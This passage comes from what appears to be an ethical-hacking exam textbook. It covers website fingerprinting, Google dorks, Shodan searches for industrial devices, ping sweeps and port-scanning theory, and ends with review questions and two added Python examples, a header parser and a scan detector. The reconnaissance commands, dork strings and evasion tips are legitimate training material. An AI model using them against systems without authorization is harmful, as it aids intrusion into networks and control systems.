llikelyhaveawebsite.Itmayevenhav
eprogrammaticelements.Anysitethathasprogrammaticelementshasthepotentialtobecompromised.Webapplicationsareacommonpointofattackforadversaries.Thisisalltosaythatgatheringintelligenceaboutawebsitecanendupbearingfruit.Startingfromthebottomofthestack,wecanlookatwhatthewebserverisaswellastheoperatingsystem.Onewaytogetsomeofthisinformationisjusttoconnecttothewebserverandissuearequesttoit.Inthefollowingcode,youcanseetheHTTPheadersreturnedfromarequesttoawebsite.Whilewedon’tgettheactualwebservername,wedogetsomeinterestinginformation.GatheringWebsiteIntelligenceHTTP/1.1301MovedPermanentlyServer:CloudFrontDate:Fri,06Jul201822:56:29GMTContent-­Type:text/htmlContent-­Length:183Connection:keep-­aliveLocation:https://www.wiley.com/140 Chapter4  Footprintingand Reconnaissance■X-­Cache:RedirectfromcloudfrontVia:1.13fed6f40ae58f485d8018b6d900fcc88.cloudfront.net(CloudFront)X-­Amz-­Cf-­Id:S_FZ4mwkJ9wY_aW24hHF3yCVvnGNNrFu6t52DGNJyc74o0iswv7Suw==Thereisactuallyaneasierwaytodothis.Thewebsitenetcraft.comwillgivehostinghistoryforwebsites.ThiswillprovidetheownerofthenetblockthatcontainstheIPaddress.Itwillalsotellyoutheoperatingsystemthewebserverrunson.Insomecases,youwillgetdetailsaboutthewebserverversionandothermodulesthathavebeenenabled.OneofthedomainsIhavehasbeenaroundforalongtime,andFigure 4.16showsthehostinghistoryforthatdomain.In2001,thesitewashostedonanOpenBSDsystem(NetcraftsaysNetBSD/OpenBSD,butsinceIwashostingitmyself,IknowitwasOpenBSD).YoucanalsoseethatitwasrunningonApacheatthattime.FIGURE 4.16 
Netcraft hosting history

While the history is interesting, it's far more relevant to know what the technology for the website is now. The top line is the most recent. Currently, the site is hosted on IIS with the network block being owned by Microsoft. That suggests that Microsoft is hosting this site, and since it's IIS, the operating system would be Windows Server. What we don't know is what version of Windows Server. The reason this information is useful is that we may be able to get a leg up on vulnerabilities. If we have some hints about versions, we would have a much better idea what vulnerabilities exist on the system where the website is hosted.

This only gives us the operating system and the web server. These days there is far more technology being used in websites. Static pages are written in HTML, but it's far more likely that you'll be running up against a dynamic site. This means you may find a site written in the PHP or Java programming language. The language itself isn't enough to provide the deep functionality needed by a robust web application. Instead, website programmers are apt to use frameworks. The frameworks can have vulnerabilities, as exhibited by the Experian data breach, which used a vulnerability in the Spring framework used by Java-based applications.

Back to the land of web browser plugins we go. One that is really good is Wappalyzer. Wappalyzer can be added to both Chrome and Firefox. When you visit a website, Wappalyzer will provide a list of technologies it identifies. This may include the web server, programming frameworks, ad networks, and tracking technology. It's not always successful in identifying everything. Going to www.google.com turns up the Google web server and an analytics framework. However, visiting CNN turns up a lot of different technologies, some of which you can see in Figure 4.17. What we don't get there is the web server being used by CNN. We will take what we get, though, considering all the other technologies in use on the site.

FIGURE 4.17
Wappalyzer for technology

There are other ways you can dig into web pages and the technologies used. One of them is Firebug. It's available on Firefox, though there is also Firebug Lite that's available in Chrome. Firebug Lite doesn't have quite the same capabilities as the full Firebug. However, on Chrome, Google has provided the developer tools. Using either the Chrome developer tools or Firebug, you can perform a deep investigation of the page you are looking at. To begin with, you can look at the document object model (DOM) and all of its components. You can also select different HTML elements in the page and identify styles and properties applicable to that section. Figure 4.18 shows a portion of the information that you can get using the Chrome developer tools. The page being inspected here is a Google search page. Using a tool like this, you can get a better understanding of how the page operates by looking at all the elements of the page and how they relate to one another.

FIGURE 4.18 Chrome developer tools

Websites are complex creatures. The Chrome developer tools and Firebug are capable of looking at only a page at a time. You'd have to dig through every page, one at a time, to investigate them and their capabilities. You may find it easier to mirror the website so you could look at it offline. With it stored locally, you could look at the pages as many times as you would like without needing to issue repeated requests to the remote server. While the requests aren't likely to raise any eyebrows and aren't even likely to be noticed, you are leaving tracks behind. One tool you can use to mirror the website is HTTrack. In the following code, you can see the results of running HTTrack to mirror a website. The program will essentially perform a spider on the remote site, storing the results in the directory provided.

Mirroring Sites with
httrack

$ httrack
Welcome to HTTrack Website Copier (Offline Browser) 3.49-2
Copyright (C) 1998-2017 Xavier Roche and other contributors
To see the option list, enter a blank line or try httrack --help

Enter project name :MySite

Base path (return=/root/websites/) :

Enter URLs (separated by commas or blank spaces) :http://www.domain.com

Action:
(enter)	1	Mirror Web Site(s)
	2	Mirror Web Site(s) with Wizard
	3	Just Get Files Indicated
	4	Mirror ALL links in URLs (Multiple Mirror)
	5	Test Links In URLs (Bookmark Test)
	0	Quit
: 1

Proxy (return=none) :

You can define wildcards, like: -*.gif +www.*.com/*.zip -*img_*.zip
Wildcards (return=none) :

You can define additional options, such as recurse level (-r), separated by blank spaces
To see the option list, type help
Additional options (return=none) :

Once you have the HTML, you can do anything you want with it. You can make changes, review all the scripts that are included in the pages, and review the pages as you need to. Not all technology is in the website, though. Organizations have a lot of other technology that can generally be mined using a variety of tools and techniques.

Technology Intelligence

Ultimately, your goal as an ethical hacker is to identify vulnerabilities within the organization you are working for. While web interfaces are an attractive place to play and look for vulnerabilities, considering how much sensitive data can be available through web interfaces, it's not the only place to look for vulnerabilities. However, you can still make use of websites to continue to explore the bounds of technology within your target company. So far, we've identified job sites and some social networking sites in order to gain intelligence about technology in use at a target. Beyond that, we can look at a couple of other areas. The first is to help really focus our web searches using Google dorks, also known as Google hacking. Additionally, we can look for devices that are part of the so-called Internet of Things (IoT).

Google Hacking

Google hacking is an important skill to have. It will improve the search responses, saving you a lot of time clicking through pages that aren't especially valuable. Once you know some of the keywords that can be used to really narrow your searches, you'll save time and become more efficient. The Google hacking techniques will help you to identify technology and vulnerabilities. In addition to Google hacking techniques, there is the Google hacking database, which is a collection of Google dorks that have been identified by someone as a way to search for a number of things. A dork is a string using Google keywords, designed to search for useful responses.

First, the Google keywords. If you've been using search engines for a long time, you may be familiar with the use of quotation marks and Boolean terms to help ensure that you are getting the right strings in your responses. In addition to those, Google uses positional keywords. You may, for instance, want to look only in the URL for a particular string. To search in the URL, you would use inurl as in the example, inurl:index. This example would find pages that included the word index anywhere in the URL. This might typically be a page like index.html, index.php, or index.jsp. If you wanted to ignore the URL and only search in the text, you could use the keyword intext.

Since you are working for an organization, you have one domain or maybe a small handful of domains. This means you will, at some point, want to search only within those domains. To do that, you can use the site keyword. You may also want to limit your results to a single file type, such as a portable document format (PDF) file or a spreadsheet. To limit your results to just one file type, you would use the filetype keyword. Perhaps you are looking for all PDF documents about Windows 10 on Microsoft's site. Figure 4.19 shows the search used for that (site:Microsoft.com filetype:pdf "Windows 10") as well as a number of results.

A great place to look for examples of useful Google dorks is the Google Hacking Database (https://www.exploit-db.com/google-hacking-database/). The Google Hacking Database (GHDB) stores search terms in several categories, including footholds, vulnerable files, error messages, and sensitive directories. Creating these useful search strings requires that you know not only about the Google hacking keywords but also about what you are looking for. Some examples are in Figure 4.20, where the search strings are looking for network or vulnerability data. This means that someone would have had to know exactly what would be in a page or URL that would include this data. Figure
4.20 shows some of these.

FIGURE 4.19 Google hacking results

Spending time at the GHDB can provide you with a lot of ammunition for looking for possible issues within your target. Some of this will be blind, if you have no idea what to expect within your target. To make sure you are only searching within your target, of course, you would need to add site: and the domain name to your search parameters. One thing you may have noticed from the Microsoft search in Figure 4.20 is that when only the domain was used, every possible hostname came back. If you want to search only within a single hostname, such as www.microsoft.com, you would provide the hostname. Only providing the domain will be another way to catch additional hostnames that you may not have been able to get using DNS searching.

FIGURE 4.20 Google Hacking Database

Internet of Things (IoT)

You will likely have heard about the IoT. The IoT is made up of devices that may have little to no input or output capabilities, at least from a traditional standpoint. If a device can run general applications and also has a keyboard and a screen, such as a computer, tablet, or smartphone, it's not part of the IoT. Many other devices, like network-connected thermostats, light bulbs, fans, refrigerators, and a number of other essentially single-purpose devices, are IoT devices. Many companies are making use of this in different automation capacities. These devices can be useful when it comes to infiltrating a system. Malware like Satori can infect multiple IoT devices, and once infected, those devices can be used to attack other systems. They may also be good starting points into the enterprise network, depending on the device.

This is another area where search engines, though, can be helpful to us. Shodan (www.shodan.io) is a search engine specifically for IoT devices. Shodan keeps track of a large number of devices along with vendors, device types, and capabilities. Shodan also requires understanding your target and what can be used to identify these devices. Figure
4.21 shows an example. The search term is port:20000 source address, which identifies Distributed Network Protocol (DNP) 3 devices. This is another area where the site can be a lot of help. The search for DNP3 devices came as a result of clicking a link for Industrial Control Systems (ICSs) and looking at different protocols that Shodan knows about. Shodan also associates with ICS the Factory Interface Network Service (FINS), Highway Addressable Remote Transducer Protocol, and many others. There are also searches for different vendors.

One thing you may notice in the statistics is the fact that the United States is on top of all countries with these devices. Shodan also identifies organizations where the devices are located. Clicking individual results provides more details, including where the device is located. Figure 4.22 shows some of those results, though it doesn't show the map that Shodan provides, presumably indicating exactly where the device is located.

FIGURE 4.21 Shodan search for DNP3

FIGURE 4.22 Shodan results

Shodan is an excellent resource when it comes to identifying devices that are considered part of the IoT. Using searches of the Shodan database, you can identify devices that may exist on the target network.
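The HTTP header listing under Website Intelligence above is read by eye in the book; the following added example (my code, not the book's) parses such a response and reports the same hints programmatically, so a tester can check what a site leaks and a site owner can check what their own edge is exposing. The CDN marker table and the "origin hidden" rule are my own assumptions, not an exhaustive list.

```python
"""Parse a raw HTTP response and pull out the hosting/technology hints the
Website Intelligence section reads off by eye (Server, Via, X-Cache, Location).
Added example, not code from the book; the CDN marker table and the
origin-hidden rule are assumptions chosen for illustration."""
import re

# The response the book captured for a request to a Wiley address.
SAMPLE_RESPONSE = (
    "HTTP/1.1 301 Moved Permanently\r\n"
    "Server: CloudFront\r\n"
    "Date: Fri, 06 Jul 2018 22:56:29 GMT\r\n"
    "Content-Type: text/html\r\n"
    "Content-Length: 183\r\n"
    "Connection: keep-alive\r\n"
    "Location: https://www.wiley.com/\r\n"
    "X-Cache: Redirect from cloudfront\r\n"
    "Via: 1.1 3fed6f40ae58f485d8018b6d900fcc88.cloudfront.net (CloudFront)\r\n"
    "X-Amz-Cf-Id: S_FZ4mwkJ9wY_aW24hHF3yCVvnGNNrFu6t52DGNJyc74o0iswv7Suw==\r\n"
    "\r\n"
)

# Header names whose presence indicates a CDN or reverse proxy in front of the
# origin (assumed mapping; extend as needed).
PROXY_MARKERS = {
    "x-amz-cf-id": "Amazon CloudFront",
    "cf-ray": "Cloudflare",
    "x-served-by": "Fastly/Varnish",
    "x-azure-ref": "Azure Front Door",
}


def parse_response(raw: str) -> tuple[int, dict[str, str]]:
    """Split status line and headers; names are folded to lowercase.
    Duplicate headers are joined with ', ' as HTTP permits for list values."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    m = re.match(r"HTTP/\d\.\d (\d{3})", lines[0])
    if not m:
        raise ValueError("not an HTTP status line: %r" % lines[0])
    headers: dict[str, str] = {}
    for line in lines[1:]:
        if ":" not in line:
            continue  # tolerate junk lines; real servers sometimes emit them
        name, value = line.split(":", 1)
        name, value = name.strip().lower(), value.strip()
        headers[name] = value if name not in headers else headers[name] + ", " + value
    return int(m.group(1)), headers


def fingerprint(raw: str) -> dict:
    """Return what a reconnaissance pass can read from the headers alone."""
    status, h = parse_response(raw)
    result = {
        "status": status,
        "server": h.get("server"),
        "powered_by": h.get("x-powered-by"),  # absent here; often names PHP/ASP.NET
        "redirect_to": h.get("location") if 300 <= status < 400 else None,
        "proxies": [],
        "origin_hidden": False,
    }
    # Each Via hop is "proto received-by [comment]"; the comment often names the product.
    for hop in h.get("via", "").split(","):
        hop = hop.strip()
        if hop:
            result["proxies"].append(hop)
    for name, product in PROXY_MARKERS.items():
        if name in h:
            result["proxies"].append(product)
    # A redirect or cache hit answered at the edge, or a Server header naming the
    # CDN, means the origin never spoke: its banner is not in this response.
    edge_terms = ("cloudfront", "cloudflare", "varnish", "akamai")
    banner = (h.get("server", "") + " " + h.get("x-cache", "")).lower()
    result["origin_hidden"] = any(t in banner for t in edge_terms)
    return result


if __name__ == "__main__":
    for k, v in fingerprint(SAMPLE_RESPONSE).items():
        print(f"{k:>14}: {v}")
```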
Summary

Footprinting and reconnaissance are important activities in an overall methodology when it comes to ethical hacking. This is the stage where you collect a lot of data that you will use later. It's also a stage where you don't want to make a lot of noise. You're sneaking up on someone to scare them. If you make noise, you get no startled reaction from your target. The same is true here. You want to do your work ahead of time so when you get started, you aren't registering a lot of activity that could get you detected and the next thing you know, you've been locked out. If you are interested to see techniques, tactics, and procedures we know real-life attackers used, you can refer to the MITRE ATT&CK Framework and get some ideas of how those attackers may operate. This can help you ensure you are providing a full set of testing to the organization you are working with.

There are multiple sources of intelligence that are freely and openly available. Using sources like the SEC's EDGAR database, you can obtain information about companies. Job sites can also provide you with details about a company that may be useful later. This includes the technology they may be using, since when they hire people, they generally provide job requirements, including technology vendors like Microsoft, Red Hat, Cisco, and Palo Alto Networks. You can also read reviews from employees that may have useful data.

Social network sites can be used to gather information about people, as well as companies. The people sometimes post information about their jobs or the company in general. Social engineering is a common attack technique, and this attack technique can be more successful if you know how to target individuals. You can also gather information about the companies themselves. Often, companies will have a social network presence. Additionally, there are sites like LinkedIn that are focused on businesses and business interactions.

The Internet requires data to function. This includes who has been allocated addresses. These allocations go through RIRs. You can use tools like whois to gather some of this data from the RIRs. The program whois can also be used to gather registration details about domains. This would include addresses, phone numbers, and contact information. Not all domains will have this information since registrars will sometimes hide the details of the registrant. What you'll get is the registrar's contact information and address and not the organization. What you will also get out of this is the registered NSs for the domain. These are the NSs considered to be authoritative for the domain.

DNS contains a lot of detail about a company if you can find it. The quickest way to get all of the hosts is to do a zone transfer, but it would be unlikely for zone transfers to be allowed. Instead, you may have to resort to something like brute-forcing DNS requests to guess possible hostnames. From this, you will get hostnames that can become targets. You will also get IP addresses. These IP addresses can be run through whois to get the network block and the owner of the block. You may get ranges of IP addresses that belong to the company from doing that.

It's a common tactic for companies to have both internal and external DNS servers. This helps protect the company by not exposing internal systems to the outside world. Once you have access to the inside of the network by compromising some system, you can look at the DNS cache. This is done on Windows systems by running ipconfig /displaydns. This will show all of the cached DNS entries, meaning hostname/IP mappings that were resolved at some point and are being stored to help speed up the resolution the next time an application needs the IP address. A cached entry will mean a network request doesn't have to be made, which can save time.

Many attacks take place through web interfaces. While gathering details about a web server or the technologies used in a website isn't entirely passive, meaning using third-party sources, making common requests to a web server shouldn't be noticed much. As long as you aren't sending too many requests all at once or sending something unusual, you'll get lost in the noise of all the other regular requests.

Google hacking is a technique you can use to narrow your search and get results that are focused and relevant. Google hacking is a technique that makes use of keywords like site, inurl, intext, filetype, and link to get very specific results. One of the most useful will be the site keyword, which means you are searching within only one domain. This means you are only looking at results within the organization you are testing for. If you need help identifying search terms that may help you identify vulnerabilities, you can use the
Google Hacking Database.

People and businesses are often using devices that have a network connection but don't have traditional means for users to interact with them. This often means these devices can be vulnerable to attack. All these devices are called the Internet of Things (IoT). There are sites like Shodan that can be used to identify these embedded devices. Shodan will provide a lot of details about a device, including the IP address and where the IP address is located. You should be able to narrow down whether the device belongs to your target company using a site like Shodan.

Review Questions

You can find the answers in the appendix.

1. If you were checking on the IP addresses for a company in France, what RIR would you be checking with for details?
A. ARIN
B. RIPE
C. AfriNIC
D. LACNIC

2. You need to identify all Excel spreadsheets available from the company Example, Inc., whose domain is example.com. What search query would you use?
A. site:example.com files:pdf
B. site:excel files:xls
C. domain:example.com filetype:xls
D. site:example.com filetype:xls

3. If you found a colleague searching at pgp.mit.edu, what would they likely be looking for?
A. Email addresses
B. Company keys
C. Executive names
D. Privacy policies

4. What information could you get from running p0f?
A. Local time
B. Remote time
C. Absolute time
D. Uptime

5. The DNS server where records for a domain belonging to an organization or enterprise reside is called the ____________ server.
A. Caching
B. Recursive
C. Authoritative
D. Local

6. What strategy does a local, caching DNS server use to look up records when asked?
A. Recursive
B. Serial
C. Combinatorics
D. Bistromathics
7. What would you use a job listing for when performing reconnaissance?
A. Executive staff
B. Technologies used
C. Phishing targets
D. Financial records

8. What tool could be used to gather email addresses from PGP servers, Bing, Google, or LinkedIn?
A. whois
B. dig
C. netstat
D. theHarvester

9. What social networking site would be most likely to be useful in gathering information about a company, including job titles?
A. Twitter
B. LinkedIn
C. Foursquare
D. Facebook

10. You see the following text written down: port:502. What does that likely reference?
A. Shodan search
B. I/O search
C. p0f results
D. RIR query

11. What would you use Wappalyzer for?
A. Analyzing web headers
B. Analyzing application code
C. Identifying web headers
D. Identifying web technologies

12. What technique would you ideally use to get all the hostnames associated with a domain?
A. DNS query
B. Zone copy
C. Zone transfer
D. Recursive request

13. What information would you not expect to find in the response to a whois query about an IP address?
A. IP address block
B. Domain association
C. Address block owner
D. Technical contact

14. What would you be looking for with the filetype:txt Administrator:500: Google query?
A. Text files owned by the administrator
B. Administrator login from file
C. Text files including the text Administrator:500:
D. 500 administrator files with text

15. What command would you use to get the list of mail servers for a domain?
A. whois mx zone=domain.com
B. netstat zone=domain.com mx
C. dig domain.com @mx
D. dig mx domain.com

16. What would you get from running the command dig ns domain.com?
A. Mail exchanger records for domain.com
B. Name server records for domain.com
C. Caching name server for domain.com
D. IP address for the hostname ns

17. If you wanted to locate detailed information about a person using either their name or a username you have, which website would you use?
A. peekyou.com
B. twitter.com
C. intelius.com
D. facebook.com

18. If you were looking for detailed financial information on a target company, with what resource would you have the most success?
A. LinkedIn
B. Facebook
C. EDGAR
D. MORTIMER

19. What financial filing is required for public companies and would provide you with the annual report?
A. 10-Q
B. 11-K
C. 401(k)
D. 14-A
20. If you were looking up information about a company in New Zealand, which RIR would you be looking in for data?
A. AfriNIC
B. RIPE
C. APNIC
D. LACNIC

Chapter 5 Scanning Networks

THE FOLLOWING CEH EXAM TOPICS ARE COVERED IN THIS CHAPTER:
✓ Communication on protocols
✓ Technical assessment methods
✓ Vulnerabilities
✓ Vulnerability scanners
✓ Network security
✓ Port scanning
✓ Security testing methodology

With all the reconnaissance and information gathering behind us, we can start moving into interacting with the systems in the target and its networks. This stage requires the data gathered from the reconnaissance and footprinting steps. Without that, you will have no idea what to scan. Of course, if you are working hand in glove, as it were, with the customer, they may have provided you with a lot of the details you would normally have gotten with reconnaissance techniques. Either way is okay, as long as you are clear up front about what the scope and scale of the engagement is and, once you start directly interacting with systems, you don't move beyond what was agreed to with your target.

Ethics Note

Just a reminder, especially as we start moving into touching systems, you must get permission. Even though we're just talking about scanning and not performing exploits, it's entirely possible for a scan to knock over a system. On really fragile systems, such as older embedded devices, a simple port scan can cause the device to fail. Ensure that you have permission from your target/client and that they have an understanding of what may happen once you get started. Expect the unexpected and inform your client/employer.

A common step to move to when first interacting with target systems is to perform a port scan. A port scan identifies open ports on systems connected to the target network. A port scan isn't done just for the purpose of doing a port scan. A port scan is a starting point for identifying services and applications that are listening on those ports. Keep in mind that the objective is always to identify issues on your target network so your client/employer can improve their security posture. Identifying applications can help us identify vulnerabilities that need to be addressed. Just identifying services and applications may not provide you with a lot of information, and what information it does provide can create a lot of work for you. Knowing the application name and even the version means you need to start digging into potential vulnerabilities that may exist with that application and service. This is why we use vulnerability scanners. The vulnerability scanner can help save time during that process. You shouldn't assume, though, that the vulnerability scanner is infallible. Vulnerability scanners can make mistakes on both ends of the spectrum, meaning it can miss vulnerabilities as well as report ones that really don't exist. The knowledge and skill of an ethical hacker is important here: knowing how to verify and knowing what is real and what isn't.

Firewalls can be a real nuisance, as can intrusion detection (or protection) systems for that matter, if you are doing a true red-team test where the operations team doesn't know what you are doing and you don't want them to know. This means that these technologies can inhibit or deter attempts to reach into the network to gather information that you can use later. Ports may be open on systems but closed in the firewall. This limits your ability to get to those applications. Your scan attempts may be detected, alerting security and operations staff about what you are doing, which may mean you just get barred altogether. Depending on the rules of the engagement, you may not want to be detected. This means there may be evasion techniques that need to be employed to make sure you can keep going and don't get blocked.

One way to achieve that, and also to poke at some functionality to identify possible vulnerabilities, is to use packet crafting. Packet crafting means you bypass the operating system and its mechanisms for creating all the data structures in the right way for transmission over the network. The reason for doing this is to create those messages incorrectly. If they don't look right, they may get ignored by firewalls or detection systems. This may allow the message to get to the endpoint.

MITRE identifies active scanning as a technique attackers use and refers to two sub-techniques, scanning IP blocks and vulnerability scanning. While MITRE is correct, the description misses a lot of detail. As you will see in the rest of this chapter, scanning IP blocks and vulnerability scanning have a lot of different tools and tactics.

Ping Sweeps

Rather than blindly throwing attacks at address spaces you've identified, you may want to identify systems that are responsive within those address spaces. Responsive means that when network messages are sent to them, they provide an appropriate response to the messages. This means you can identify systems that are alive before you start aiming attacks or probes at them. One way of determining systems that are alive is to perform a ping sweep. A ping sweep is when you send ping messages to every system on the network. The ping is an ICMP echo request, which is a common message to be sent. As long as you aren't pounding targets with an unusual number or size of these messages, they may not be noticed. Ping sweeps aren't guaranteed to succeed because there may be firewall rules that block ICMP messages from outside the network.

Using fping

While there are many tools that can perform a ping sweep, one of the common ones is fping. This is a tool designed to send ICMP echo requests to multiple systems. In the following code listing, you can see the use of fping to sweep my local network. The parameters used with fping are aeg, which means fping shows hosts that are alive, shows elapsed time, and generates a list of targets from an address block. You'll see the list of hosts that
respond at the front of the list. After that, you start to see host unreachable messages, indicating that the host is down. fping will send multiple messages to systems before giving up and determining it's down. This output is truncated due to length, but without the a, the end of the list would be all of the hosts that were flagged as down. As it is, all we get is the indication that the systems were up.

fping Output

$ fping -aeg 192.168.86.0/24
192.168.86.1 (10.3 ms)
192.168.86.2 (16.4 ms)
192.168.86.12 (27.7 ms)
192.168.86.21 (17.4 ms)
192.168.86.11 (173 ms)
192.168.86.20 (82.7 ms)
192.168.86.31 (0.04 ms)
192.168.86.30 (14.3 ms)
192.168.86.32 (16.4 ms)
192.168.86.35 (16.9 ms)
192.168.86.37 (21.7 ms)
192.168.86.38 (20.4 ms)
192.168.86.39 (22.2 ms)
192.168.86.22 (216 ms)
192.168.86.43 (15.6 ms)
192.168.86.44 (14.7 ms)
192.168.86.49 (0.37 ms)
192.168.86.50 (14.3 ms)
192.168.86.51 (18.8 ms)
192.168.86.52 (15.3 ms)
192.168.86.28 (294 ms)
192.168.86.58 (19.9 ms)
192.168.86.47 (375 ms)
192.168.86.53 (508 ms)
192.168.86.63 (404 ms)
192.168.86.160 (15.6 ms)
192.168.86.162 (25.7 ms)
192.168.86.170 (14.6 ms)
192.168.86.189 (18.9 ms)
192.168.86.196 (25.6 ms)
192.168.86.200 (32.7 ms)
192.168.86.205 (72.2 ms)
192.168.86.210 (18.3 ms)
192.168.86.245 (15.6 ms)
192.168.86.247 (23.4 ms)
192.168.86.250 (25.9 ms)
ICMP Host Unreachable from 192.168.86.31 for ICMP Echo sent to 192.168.86.4
ICMP Host Unreachable from 192.168.86.31 for ICMP Echo sent to 192.168.86.4
ICMP Host Unreachable from 192.168.86.31 for ICMP Echo sent to 192.168.86.3
ICMP Host Unreachable from 192.168.86.31 for ICMP Echo sent to 192.168.86.3
ICMP Host Unreachable from 192.168.86.31 for ICMP Echo sent to 192.168.86.7
ICMP Host Unreachable from 192.168.86.31 for ICMP Echo sent to 192.168.86.7
ICMP Host Unreachable from 192.168.86.31 for ICMP Echo sent to 192.168.86.6
ICMP Host Unreachable from 192.168.86.31 for ICMP Echo sent to 192.168.86.6

Since the e parameter was passed to fping, it provides the elapsed time. This is the round-trip time between the message that was sent and the response that was received. Some of these round-trip times are fairly high, considering it's all on the local network, even if fping is running on a virtual machine, where the host operating system is using wireless. While we have a lot of systems indicating responses, that doesn't mean those are the only systems that exist on the network. Since this is the local network, we can be reasonably sure that all of this information is correct. However, network- and host-based firewalls may also block these ICMP echo requests. Just because you don't get a response does not mean that the hosts are not up. It may mean that there is something that's blocking the message. A firewall may respond with an ICMP host unreachable, just as you see in the preceding code, or it may simply drop the message, meaning there would be no response. There may be other reasons for lack of a response, though.

Using MegaPing

Another tool that can perform a ping sweep, as well as several other functions, is MegaPing. MegaPing is a GUI-based tool that runs under Windows. It incorporates several functions into a single interface. The ping sweep can be accomplished using the IP Scanner tool, which you would select from the list on the left side. Figure 5.1 shows the full interface after running the IP scan. By default, the MAC address and hostnames are not included in the list. There are check boxes on the right side, however, that can be checked even after you have run a scan, and the information will be added.
FIGURE 5.1 MegaPing IP scanner

Along the left side, you will see several other tools that you can make use of. It becomes a bit of a Swiss Army knife for the purposes of network troubleshooting. In addition to troubleshooting network issues, there is also a port scanning tool. I'll cover port scanning in more detail in the next section. There are other enumeration utilities you may find useful as you are identifying systems and services on your target network.

Hands-on Activity

Download a copy of MegaPing from the Magento Software website. Run a ping sweep using the IP scanner. Make sure to identify the MAC addresses for all the systems.

The ping sweep may be telling, but it's only a start. It may be used just to get a sense of the number of hosts that you may need to think about testing. The ping sweep will give you only a limited amount of information. Just knowing a host is up (and the information that a host isn't up may be unreliable) doesn't tell you a lot. Ultimately, you want to know what services are running on the host. A ping sweep will give you an idea of what systems may be targetable. Depending on how you are approaching your testing and where you are, this may be valuable. You may also consider just moving directly to a port scan, especially since port scanners will often do a ping ahead of the port scan to make sure the system is up before bothering to send port probes.

Port Scanning

Let's clear this up, in case there is confusion. We aren't talking about passing by a cruise ship, peering in windows. We are talking about network communication devices. A port is a construct within the operating system's network stack. When an application has network service functionality, it binds to a port, meaning it reserves the port and registers the application to get messages that come in on that port. Any communication received by the system addressed to one of the ports gets forwarded to the application that is registered to that port. When there is an application listening on a port, it is considered to be open. Remember that ports exist at the Transport layer, so applications determine whether they are going to use UDP or TCP as the protocol to listen on. The reason for mentioning this is that the objective of port scanning is to identify the software that is bound to the ports that are identified as open.

TCP, as you should know, uses a three-way handshake to initiate connections. To accomplish the handshake, TCP makes use of flag settings, which means there is a set of bits that are enabled or disabled to set or unset the flags. The three-way handshake uses the SYN and ACK flags to complete the connection process. Other flags, such as URG, PSH, and FIN, are used for other purposes, and the RST flag is used to let other systems know to cease communications on the destination port in the received message. Port scanners make use of the known rules in the protocol to make determinations about whether a port is open or not. Open ports should respond to a SYN message with a SYN/ACK. Closed ports should respond to a SYN message with a RST message.

What happens, though, if we send other messages to open or closed ports? Why would we even do that, considering that we know how open and closed ports respond? The reason relates to security technologies like firewalls and intrusion detection systems. Other TCP messages are used to bypass these devices and get responses where there otherwise may not be any response. The way the protocol is expected to work is documented and so network stack implementations adhere to the documentation. There are some exchanges that are simply not documented, so behavior isn't guaranteed because it's not expected. These exchanges can be used to elicit responses from our target systems.

UDP is another story altogether. There is no defined way of beginning a conversation from the standpoint of the protocol. UDP messages are sent from a client to a server, and it's up to the server how it responds. The operating system's network stack has no role other than to pass the message up to the application once the Transport layer headers have been processed. This can be a challenge for port scanners. The reason is that with no defined response, it's hard to determine whether a lack of response is because of a closed port or just because the application didn't receive what it expected. It could also be that the server application listening at that port simply doesn't respond.
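The chapter notes that a ping sweep "may not be noticed" and that scan attempts "may be detected"; what makes both noticeable is their shape in connection logs, one source touching many hosts (the fping sweep above) or one source sending bare SYNs to many ports of one host (the SYN probing just described). The following added example, my code and not the book's, flags both shapes over a constructed log; the record layout, thresholds and addresses are assumptions chosen for illustration.

```python
"""Detect the two scan patterns this chapter describes, ping sweeps (one source
probing many hosts) and TCP SYN port scans (one source probing many ports of
one host), from connection-log records. Added example, not code from the book;
the record format, the thresholds and the addresses are assumptions."""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Flow:
    ts: float        # seconds since some epoch
    src: str
    dst: str
    proto: str       # "icmp" or "tcp"
    dport: int       # 0 for icmp
    flags: str       # TCP flags of the first packet, e.g. "S", "SA", "R"; "" for icmp
    icmp_type: int   # 8 = echo request; -1 for non-icmp


def sweep_alerts(flows, window=10.0, min_hosts=16, min_ports=20):
    """Return (kind, src, dst_or_None, count) tuples. A source is reported once
    per kind when, within any `window` seconds, it sends echo requests to at
    least `min_hosts` distinct hosts, or bare SYNs to at least `min_ports`
    distinct ports of one host. SYN/ACK and RST replies are ignored so that a
    victim answering a scan is never itself reported as the scanner."""
    flows = sorted(flows, key=lambda f: f.ts)
    alerts, seen = [], set()
    buckets = defaultdict(list)  # key -> [(ts, dst-or-dport), ...] inside the window
    for f in flows:
        if f.proto == "icmp" and f.icmp_type == 8:
            key, item, threshold = ("sweep", f.src, None), f.dst, min_hosts
        elif f.proto == "tcp" and f.flags == "S":
            key, item, threshold = ("portscan", f.src, f.dst), f.dport, min_ports
        else:
            continue
        b = buckets[key]
        b.append((f.ts, item))
        while b and b[0][0] < f.ts - window:  # expire entries outside the window
            b.pop(0)
        distinct = {i for _, i in b}
        if len(distinct) >= threshold and key not in seen:
            seen.add(key)
            alerts.append((key[0], key[1], key[2], len(distinct)))
    return alerts


def constructed_log():
    """Constructed sample records, not a real capture."""
    flows = []
    # Benign: 192.168.86.31 pings its gateway once a second (one host, many packets).
    for i in range(30):
        flows.append(Flow(i * 1.0, "192.168.86.31", "192.168.86.1", "icmp", 0, "", 8))
    # Ping sweep: 192.168.86.99 hits .1 through .40 in eight seconds, fping-style.
    for i in range(1, 41):
        flows.append(Flow(100 + i * 0.2, "192.168.86.99", f"192.168.86.{i}", "icmp", 0, "", 8))
    # SYN scan: 10.0.0.5 probes ports 20-44 on 192.168.86.20; closed ports answer RST.
    for i, port in enumerate(range(20, 45)):
        flows.append(Flow(200 + i * 0.1, "10.0.0.5", "192.168.86.20", "tcp", port, "S", -1))
        flows.append(Flow(200 + i * 0.1 + 0.01, "192.168.86.20", "10.0.0.5", "tcp", 40000 + i, "R", -1))
    # Slow scan: 10.0.0.6 sends one SYN every five minutes; invisible at a 10 s window.
    for i in range(30):
        flows.append(Flow(1000 + i * 300.0, "10.0.0.6", "192.168.86.20", "tcp", 1000 + i, "S", -1))
    return flows


if __name__ == "__main__":
    for alert in sweep_alerts(constructed_log()):
        print("default window:", alert)
    for alert in sweep_alerts(constructed_log(), window=7200.0):
        print("2h window:     ", alert)
```

The slow scanner only shows up when the window is widened to two hours, which is the trade-off a detection engineer tunes: a long window catches patient scanning at the cost of more state per source.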
